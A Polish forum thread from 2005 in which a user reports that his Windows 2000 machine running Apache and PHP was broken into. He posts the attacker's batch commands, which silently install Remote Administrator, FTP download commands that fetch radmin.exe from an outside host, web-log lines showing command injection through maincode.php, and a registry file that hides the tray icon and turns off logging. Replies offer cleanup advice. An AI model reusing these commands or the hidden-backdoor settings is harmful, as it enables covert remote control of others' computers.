Włamanie do kompa? Tylko jak?
Mam kompa z Win 2000 prof. SP4.
Zostawiłem go wczoraj włączonego na noc. Dziś rano zobaczyłem, źe jest odpalona konsola cmd, w której został wykonany skrypt o treści:
W systray zobaczyłem ikonkę programu Remote Administrator.
Ja tego programu nawet nie istalowałem, komp był zabezpieczony hasłem, więc jedyna moźliwość to włamanie przez internet. Odpowiednie pliki znalazły się w katalogu Recycled\System32.
Pytanie brzmi jak to moźliwe, źeby ktoś uruchomił sobie na moim kompie zdalnie jakiś program. Przyznaję, źe nie miałem firewalla?
Zostawiłem go wczoraj włączonego na noc. Dziś rano zobaczyłem, źe jest odpalona konsola cmd, w której został wykonany skrypt o treści:
rs.exe /install /silence
reg IMPORT radminsettings.reg
rs /start
del radminsettings.reg
del radown.bat
W systray zobaczyłem ikonkę programu Remote Administrator.
Ja tego programu nawet nie istalowałem, komp był zabezpieczony hasłem, więc jedyna moźliwość to włamanie przez internet. Odpowiednie pliki znalazły się w katalogu Recycled\System32.
Pytanie brzmi jak to moźliwe, źeby ktoś uruchomił sobie na moim kompie zdalnie jakiś program. Przyznaję, źe nie miałem firewalla?
Odpowiedzi: 6
Bobi:
Chyba nie doceniasz robaków szczegółnie tych sieciowych.
Remadmin udostępnia się w sieci, nie koniecznie Twój komputer musi być zródłem infekcji, moźe nim być równie dobrze kaźdy inny komputer w Twojej sieci.
Po prostu coś podłapałeś.
Tylko dlaczego wszystko się wydarzyło, kiedy mnie nie było przy kompie? Chyba, źe emule coś ściągnął.
Chyba nie doceniasz robaków szczegółnie tych sieciowych.
Remadmin udostępnia się w sieci, nie koniecznie Twój komputer musi być zródłem infekcji, moźe nim być równie dobrze kaźdy inny komputer w Twojej sieci.
Po prostu coś podłapałeś.
Remadmin udostępnia się w sieci, nie koniecznie Twój komputer musi być zródłem infekcji, moźe nim być równie dobrze kaźdy inny komputer w Twojej sieci.
Po prostu coś podłapałeś.
Nie koniecznie musiało byc to włamanie, mógł być to robak
Nie wiem, czy robak tworzyłby w katalogu dokumentów serwera jakieś pliki tekstowe i ściągał za ich pomocą inne programy przez ftp.
Przykładowy plik:
echo open ftp.dhcp.edu.ms 26333>c
echo dcom>>c
echo dcom>>c
echo bin>>c
echo get radmin.exe>>c
echo bye>>c
ftp –s:c
radmin
Po za tym w logach serwera znalazłem takie wpisy:
216.37.18.165 – – [18/Aug/2005:16:31:03 +0200] "GET /maincode.php?x=echo%20open%20ftp.dhcp.edu.ms%2026333%3Ea HTTP/1.0" 200 0
216.37.18.165 – – [18/Aug/2005:16:31:03 +0200] "GET /maincode.php?x=echo%20dcom%3E%3Ea HTTP/1.0" 200 0
216.37.18.165 – – [18/Aug/2005:16:31:03 +0200] "GET /maincode.php?x=echo%20dcom%3E%3Ea HTTP/1.0" 200 0
216.37.18.165 – – [18/Aug/2005:16:31:04 +0200] "GET /maincode.php?x=echo%20bin%3E%3Ea HTTP/1.0" 200 0
216.37.18.165 – – [18/Aug/2005:16:31:04 +0200] "GET /maincode.php?x=echo%20get%20adown.exe%3E%3Ea HTTP/1.0" 200 0
216.37.18.165 – – [18/Aug/2005:16:31:05 +0200] "GET /maincode.php?x=echo%20bye%3E%3Ea HTTP/1.0" 200 0
216.37.18.165 – – [18/Aug/2005:16:31:17 +0200] "GET /maincode.php?x=ftp%20–s%3Aa HTTP/1.0" 200 96
216.37.18.165 – – [18/Aug/2005:16:34:31 +0200] "GET /maincode.php?x=adown.exe HTTP/1.0" 200 1398
gdzie plik maincode.php ma postać:
Jak ten plik się tam, znalazł nie mam pojęcia.
Na szczęście byłem zalogowany jako zwykły user, więc nie namieszał nic w rejestrze. Nie udało mu się nic dodać do usług :)
Nie koniecznie musiało byc to włamanie, mógł być to robak REMADM
Kosz opróznij i usuń z rejestu klucz HKEY_LOCAL_MACHINE\SYSTEM\RAdmin o ile istnieje
Kosz opróznij i usuń z rejestu klucz HKEY_LOCAL_MACHINE\SYSTEM\RAdmin o ile istnieje
Włamywacz nie zdołał zarejestrować usług, poniewaź komp pracował na końcie uźytkownika. Pliki rs.exe znalazłem równieź w koszu.
Plik radminsettings.reg:
Plik radown.bat został usunięty.
Poza rs.exe w koszu znalazłem jeszcze takie cuda:
cdir.txt ct.exe
gwwl.txt inftp.bat libeay32.dll plik.txt
ServUDaemon.ini sqlhst.exe ssleay32.dll
oraz jakiś program w katalogu o nazwie hbot ale ma duźo plików, więc nie wypisuję ich tutaj.
Juź wiem, źe do włamania doszło przez serwer Apache z PHP.
Plik radminsettings.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:42,16,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
"NTAuthId"=hex:02,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:f1,e9,e6,f5,03,02,1f,93,63,46,e0,c4,22,d3,4e,9a
Plik radown.bat został usunięty.
Poza rs.exe w koszu znalazłem jeszcze takie cuda:
cdir.txt ct.exe
gwwl.txt inftp.bat libeay32.dll plik.txt
ServUDaemon.ini sqlhst.exe ssleay32.dll
oraz jakiś program w katalogu o nazwie hbot ale ma duźo plików, więc nie wypisuję ich tutaj.
Juź wiem, źe do włamania doszło przez serwer Apache z PHP.
Nie wazne w jaki sposób to się znalazło w Twoim systemie bo mogło sie to stać na dziesiątki sposobów, waźne jak się tego pozbyc.
Remote Administrator to program do zdalnego zarządzania komputerem z sieci, najpewniej startuje w trybie usługi i tą usługę trzeba zlokalizowac i usunąc.
Ponadto poszukaj na dysku pliku rs.exe i usuń go
Pliki radminsettings.reg oraz radown.bat widze ze znalazłeś w koszu, otwórz obydwa w notatniku i wklej do posta treść.
Usługi wylistuje HijackThis.
Remote Administrator to program do zdalnego zarządzania komputerem z sieci, najpewniej startuje w trybie usługi i tą usługę trzeba zlokalizowac i usunąc.
Ponadto poszukaj na dysku pliku rs.exe i usuń go
Pliki radminsettings.reg oraz radown.bat widze ze znalazłeś w koszu, otwórz obydwa w notatniku i wklej do posta treść.
Usługi wylistuje HijackThis.
Strona 1 / 1